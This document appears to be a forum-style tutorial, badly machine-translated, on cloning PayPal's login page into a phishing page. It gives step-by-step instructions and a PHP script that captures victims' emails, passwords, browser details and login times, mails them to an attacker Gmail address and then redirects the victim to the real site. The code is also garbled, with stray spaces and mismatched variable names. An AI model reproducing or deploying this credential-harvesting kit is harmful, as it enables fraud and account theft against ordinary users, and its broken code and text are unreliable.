A scam page is a fake webpage. e.g. a login of a popular website, online bank login, etc. depending on what it is. Scam pages are used by spammers to collect data of people who get scammed. Detecting a scam page is simple if you are technology-oriented, but most common users can’t detect scam pages. This is a big problem in the www. Some companies are developing software to combat scams or phishing scams - phishing is the term used for this scam.
OK, so first we choose a target.
We chose www.paypal.com
Navigate to the chosen site. Press CTRL + S and save the file. Html somewhere on your computer.
We open … There might be a problem, namely the way the image.
If the relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)
Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F … (Here the words are different .. try and password, password, username, etc.. Dak login does not work).
You have a code like <form action=“login2.php”>. Login2.php change in 040147.php!
Now, the username should be code-like. name = “email” tells us that in PHP script authentication is the variable that your email username.
Good memory.
The password, the code should be similar ( ). So, the password is held in variable password. A and memorize it.
Now, where you have saved. Html, create a new file called 040147.php.
In it, add the following code:
$ To = “tryyourluck@gmail.com”
$ Name = $ _POST [‘email’];
$ Email = $ _POST [‘email’];
$ Subject = $ _POST [‘subject’];
$ Password = $ _POST [‘password’];
$ Agent = $ _SERVER [‘HTTP_USER_AGENT’];
$ D = date (‘l dS \ of F Y h: i: s A’);
$ Sub = “New Account Hacked PayPal - $ email”;
$ Headers = “From: $ name <$ email> \ n”;
$ Headers .= “Content-Type: text / plain, charset = iso-8859-1 \ n”;
$ Mes .= ‘Username:’. $ Email. “\ N”;
$ Msg .= “Password:”. $ Password. “\ N”;
$ Msg .= “Browser:”. $ Agent. “\ N”;
$ Msg .= “IP:”. $ Ip. “\ N”;
$ Mes .= ‘Date and time:’. $ D;
mail ($ to, $ sub, $ mes, $ headers);
header (“Location: www.paypal.com”);
Modify code
$ To = “goodluck@gmail.com”
and put your mail. The code above variables over email and password and sends them together with some more useful details.
Rename HTML into index.html. Php, you upload the 2 files on a host and entertain.